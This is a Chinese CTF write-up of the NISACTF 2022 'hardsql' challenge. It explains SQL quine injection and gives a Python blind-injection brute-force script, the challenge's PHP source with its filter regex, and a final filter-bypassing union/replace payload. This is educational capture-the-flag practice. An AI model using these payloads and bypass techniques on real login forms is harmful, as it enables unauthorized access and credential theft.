提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
目录
前言
一、Quine是什么?
二、[NISACTF 2022]hardsql
前言
提示:这里可以添加本文要记录的大概内容:
SQL注入的各种手段很多,今天做CTF题的时候,又遇到了一种不常考的但是很细节的注入,记录一下。
提示:以下是本篇文章正文内容,下面案例可供参考
一、Quine是什么?
Quine指的是自产生程序,简单的说,就是输入的sql语句与要输出的一致,下面是例题。
二、[NISACTF 2022]hardsql
题目提示:
$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";
1,进入题目:
题目说登录的账号为bilala,只有登录密码是可注入的点,首先要进行登录,进行一些常规注入的小尝试,发现存在waf过滤了空格,and,updatexml,=,database,sleep,information_schema之类的,过滤的挺多。可以利用like+通配符%进行密码的爆破,爆破脚本如下:
import requests
url = 'http://1.14.71.254:28860/login.php'
str = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
flag = ''
for i in range(62):
for j in str:
data = {
'username': 'bilala', "passwd":f"-1'/**/or/**/passwd/**/like/**/'{flag+j}%'#"
}
response = requests.post(url, data=data)
if "nothing found" not in response.text:
flag = flag + j
print(flag)
break
print(flag)
登录进去后,看到了源码:
<?php
//多加了亿点点过滤
include_once("config.php");
function alertMes($mes,$url){
die("<script>alert('{$mes}');location.href='{$url}';</script>");
}
function checkSql($s) {
if(preg_match("/if|regexp|between|in|flag|=|>|<|and|\||right|left|insert|database|reverse|update|extractvalue|floor|join|substr|&|;|\\\$|char|\x0a|\x09|column|sleep|\ /i",$s)){
alertMes('waf here', 'index.php');
}
}
if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['passwd']) && $_POST['passwd'] != '') {
$username=$_POST['username'];
$password=$_POST['passwd'];
if ($username !== 'bilala') {
alertMes('only bilala can login', 'index.php');
}
checkSql($password);
$sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";
$user_result=mysqli_query($MysqlLink,$sql);
$row = mysqli_fetch_array($user_result);
if (!$row) {
alertMes('nothing found','index.php');
}
if ($row['passwd'] === $password) {
if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
show_source(__FILE__);
die;
}
else{
die($FLAG);
}
} else {
alertMes("wrong password",'index.php');
}
}
?>
解题的关键思路在:
if ($row['passwd'] === $password) { #关键
if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
show_source(__FILE__);
die;
}
else{
die($FLAG);
}
} else {
alertMes("wrong password",'index.php');
}
}
查询出来的passwd要和$password强相等,且$passwor不等于b2f2d15b3ae082ca29697d8dcd420fd7。
但是事实上这张表其实是个空表,只有构造输入输出完全一致的语句,才能绕过限制得到FLAG,主要利用replace(str,old_string,new_string)进行构造,构造思路如下:
select replace(
'replace(".",char(46),".")'
,char(46),
'replace(".",char(46),".")'
);
利用'replace(".",char(46),".")');替换'replace(".",char(46),".")'中的符号.
输入和输出的结果为:
replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")');
replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")") ;
这样其实还没有达到输入和输出一致的问题,因为还有单引号和双引号不一致,所以要解决单双引号的问题,再套一层replace,将双引号替换成单引号即可,如下:
replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');
输出的结果为:
replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")')
这样就形成了输入和输出的结果一致 。
题中还过滤了char,用chr或者直接0x代替即可。
所以最终的payload为:
username=bilala&passwd='/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#')#&login=%E7%99%BB%E5%BD%95文章来源:https://www.toymoban.com/news/detail-432461.html
文章来源地址https://www.toymoban.com/news/detail-432461.html
到了这里,关于SQL注入之Quine注入的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!